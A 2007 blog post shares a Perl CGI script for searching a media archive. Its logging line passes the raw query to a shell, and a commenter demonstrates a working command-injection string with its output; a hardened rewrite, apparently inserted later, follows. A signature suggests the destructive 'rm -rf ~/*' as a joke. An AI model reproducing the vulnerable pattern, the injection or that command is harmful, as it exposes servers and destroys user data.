Weblog entry #1 for w1d3

web locate
Posted by w1d3 on Fri 16 Feb 2007 at 17:54
Yesterday I made this very simple CGI script to search my music and video archive. It uses the 'locate' command and displays the results as HTML, so I don't have to log into my storage machine all the time :) It should remove all non-alphanumeric characters from the query and also log the query words.
#!/usr/bin/perl -w

use CGI qw(:standard);
use strict;

print header;
print start_html(-title=>'web locate');

# The form shows the query field inside a fake command line
print startform,
"locate&nbsp;",
textfield(-name=>'query',
          -size=>20,
          -maxlength=>20),
"&nbsp;| grep mp3 wav avi mpg m2v wmv&nbsp;",
submit(-value=>'Enter'),
endform;

print hr;
if(param){
        my $word = param('query');
        # log the query as typed
        `echo \'$word\' >> search.log`;
        if(length($word) < 3){
                print "longer pls", p;
        }else{
                # keep only letters and digits before running locate
                $word =~ tr/a-zA-Z0-9//cd;
                my $result = `locate -i $word | grep -i -e mp3 -e wav -e avi -e mpg -e m2v -e wmv`;
                # one result per line in the HTML output
                $result =~ s/\n/<br>/g;
                print $result;
        }
};
print end_html;
I hope that someone will find it useful. It's also quite easy to change according to your needs, to find other file types etc. Feedback welcome! :)


Comments on this Entry

Posted by w1d3 (85.145.xx.xx) on Fri 16 Feb 2007 at 17:57
sorry, &nbsp; changed into \ in the pasted code :(


Posted by Steve (62.30.xx.xx) on Fri 16 Feb 2007 at 22:34

Congratulations - you've just allowed remote users to execute arbitrary commands upon your server..!

Although you delete non-alphanumeric characters before executing your locate command you do not do so before logging.

Consider this code:

if(param){
        my $word = param('query');
        `echo \'$word\' >> search.log`;
...
}

Now consider the following query string:

word=test'%0d;/usr/bin/id%3E/tmp/foo

This decodes to:

test'
;/usr/bin/id>/tmp/foo

Which together becomes:

 echo 'test'
 /usr/bin/id>/tmp/foo >> search.log

Leaving:

skx@mine:~/cvs/yawns$ ls /tmp/fof^M -l
-rw-r--r-- 1 www-data www-data 54 2007-02-16 22:30 /tmp/fof?
skx@mine:~/cvs/yawns$ cat /tmp/fof^M
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Surprise!

Steve


Posted by w1d3 (85.145.xx.xx) on Fri 16 Feb 2007 at 23:53
nice, this is exactly what I wanted to know :) thanks


Posted by Anonymous (59.176.xx.xx) on Sun 18 Feb 2007 at 06:32
Tee hee! Well spotted Steve! Go to the front of the class and collect your gold star!

For the rest of us who don't quite manage to get into Steve's state of Vulcan mindmeld with perl code, the taint (-T) option will give you a slap across the wrist during coding. Use it!

PJ

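A hardened rewrite of the search block that addresses Steve's finding and takes PJ's -T advice, as an added example (not the original script or anyone's code from this thread): a regex capture both validates and untaints the query, the log is written with Perl file I/O, and locate is started with a list-form pipe open so no shell ever sees the input. The form-printing part of the original is assumed unchanged and left out; filtering by file extension in Perl and the 3 to 20 character limit are choices made for this example.

```perl
#!/usr/bin/perl -T
# Hardened rewrite of the search block (added example, not the author's code).
# No shell is ever involved, so query text cannot turn into a command.
use strict;
use warnings;
use CGI qw(:standard);

# Taint mode refuses to start subprocesses with an untrusted environment.
$ENV{PATH} = '/usr/bin:/bin';
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

# Return the untainted query, or undef if it fails the allowlist.
# Only a regex capture counts as clean under -T, so the check lives here.
sub clean_query {
    my ($raw) = @_;
    return unless defined $raw && $raw =~ /\A([A-Za-z0-9]{3,20})\z/;
    return $1;
}

# Append to the log with Perl I/O instead of `echo ... >> search.log`.
sub log_query {
    my ($word) = @_;
    open(my $log, '>>', 'search.log') or die "cannot open search.log: $!";
    print $log "$word\n";
    close $log;
}

# Run locate through a list-form pipe open: each argument goes straight
# to execve, never through /bin/sh, and the result is filtered in Perl.
sub run_locate {
    my ($word) = @_;
    my $re = join '|', map { quotemeta } qw(mp3 wav avi mpg m2v wmv);
    open(my $fh, '-|', 'locate', '-i', '--', $word) or die "cannot run locate: $!";
    my @hits = grep { /\.(?:$re)$/i } <$fh>;
    close $fh;
    chomp @hits;
    return @hits;
}

print header, start_html(-title => 'web locate');
if (param) {
    my $word = clean_query(param('query'));
    if (!defined $word) {
        print "3 to 20 letters or digits only", p;
    } else {
        log_query($word);
        # escapeHTML stops odd file names from injecting markup into the page.
        print map { CGI::escapeHTML($_) . '<br>' } run_locate($word);
    }
}
print end_html;
```

Start it through the #! line (or as perl -T script.cgi) so taint mode is active; perl otherwise stops with "Too late for -T option".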

Posted by jonesy (220.233.xx.xx) on Sat 17 Feb 2007 at 23:49
I actually wrote a very similar perl web interface for searching for files a few months back, with a couple of differences:

* I used a cpan module to interface with slocate
* I build separate slocate databases, so that I only indexed locations I wanted to rather than the whole filesystem.

-Jonesy


Posted by w1d3 (85.145.xx.xx) on Tue 20 Feb 2007 at 16:45
I wanted to make it as simple as possible. The locate database is already present in the system and is updated regularly (frequently enough for me), so there is no need to build another one. And a specific location can easily be grep-ed from the answer. But I agree that a different approach may be more appropriate in a specific case.


Posted by busfault (69.205.xx.xx) on Sun 18 Feb 2007 at 02:39
This has reminded me how much I hate "special characters". For one, go and try to look up special characters on any search engine; it gives you NOTHING. However, I believe that these characters should somehow be usable in a search, since there are times when it can become necessary. For example: what if you were a new perl user and didn't know what $? means? Try looking for that online... (even trying to escape the chars) good luck! It's kind of funny, since google gives back an unexpected result in format when you search for them: as opposed to "Your search - $? - did not match any documents." as one might expect, it is a blank google page. Most perl sites' search pages can't handle them either. I understand the whole regexp and arbitrary commands on server issue, but it can be annoying if they are removed.
-Tom
Running out of disk quota space, try rm -rf ~/*
Having horrible computer karma? Install Linux, your computer problems shall vanish.
